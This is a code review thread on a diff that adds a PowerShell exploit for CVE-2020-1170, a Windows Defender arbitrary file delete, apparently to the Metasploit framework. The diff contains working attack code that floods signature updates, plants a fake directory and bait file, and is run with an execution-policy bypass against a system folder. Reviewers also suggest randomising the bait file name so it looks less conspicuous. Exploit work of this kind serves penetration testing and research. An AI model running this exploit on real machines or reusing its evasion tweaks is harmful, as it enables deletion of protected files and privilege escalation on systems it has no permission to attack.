data/exploits/CVE-2020-1170/DefenderArbitraryFileDelete.ps1

```diff
@@ -0,0 +1,217 @@
+# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
+# All credits go to @itm4n for this PowerShell script!
+
+# Testing
+# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
+# Real
+# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'
+
+$JobCode = {
+    function DoMpCmdRunLogFileWriteTriggerJob {
+
+        [CmdletBinding()] param()
+
+        for ($i=0; $i -lt 15000; $i++) {
+            Update-MpSignature -UpdateSource InternalDefinitionUpdateServer
+        }
+    }
+}
+
+function DoMain {
+
+    [CmdletBinding()] param(
+        [Parameter(Mandatory=$True)][string] $TargetFolder,
+        [Parameter(Mandatory=$True)][string] $NtApiDLLPath
+    )
+
+    $TimeoutInMinutes = 90
+    $StartDate = Get-Date
+    $Success = $False
+
+    $TargetFolderPath = Resolve-Path -Path $TargetFolder -ErrorAction Stop
+
+    if (-not [System.IO.Directory]::Exists($TargetFolderPath)) {
+        Write-Host "[-] Target folder doesn't exist." -ForegroundColor Red
+        return
+    }
+
+    ### Load NtApiDotNet
+    Import-Module "$NtApiDLLPath" -ErrorAction "Stop"
+    Write-Host "[*] Loaded '$NtApiDLLPath'"
+
+    ### Prepare workspace
+    # Create workspace directory
+    $WorkspaceFolderPath = Join-Path -Path $env:TEMP -ChildPath $([Guid]::NewGuid())
+    $Null = New-Item -Path $WorkspaceFolderPath -ItemType Directory
+
+    # Fake target folder
+    $TargetFolderName = Split-Path -Path $TargetFolderPath -Leaf
+    $TargetFolderParent = Split-Path -Path $TargetFolderPath -Parent
+    $FakeTargetFolderPath = Join-Path -Path $WorkspaceFolderPath -ChildPath $TargetFolderName
+    $Null = New-Item -Path $FakeTargetFolderPath -ItemType Directory
+
+    # Fake directory structure
+    Get-ChildItem -Path $TargetFolderPath -ErrorAction Stop | ForEach-Object {
+        $Path = Join-Path -Path $FakeTargetFolderPath -ChildPath $_.Name
+        if ([System.IO.Directory]::Exists($_.FullName)) {
+            $Null = New-Item -Path $Path -ItemType Directory
+        } else {
+            $Null = New-Item -Path $Path -ItemType File
+        }
+    }
+
+    ### Prepare bait file
+    $BaitFolderPath = Join-Path -Path $WorkspaceFolderPath -ChildPath "0000"
+    $Null = New-Item -Path $BaitFolderPath -ItemType Directory
+    $BaitFilePath = Join-Path -Path $BaitFolderPath -ChildPath "bait.txt"

```

Comment:
Randomizing this with a `gsub` in `exploit()` might be nice. `bait.txt` is not what I would call inconspicuous.

Reply:
This code is mostly from @itm4n's PoC. I haven't applied any changes to it cause this PR is still a WIP. I agree it needs improvement though for issues such as these

Reply:
Ok updated the code so that the PowerShell script will now take in a randomized file name from the main exploit itself as a command line argument.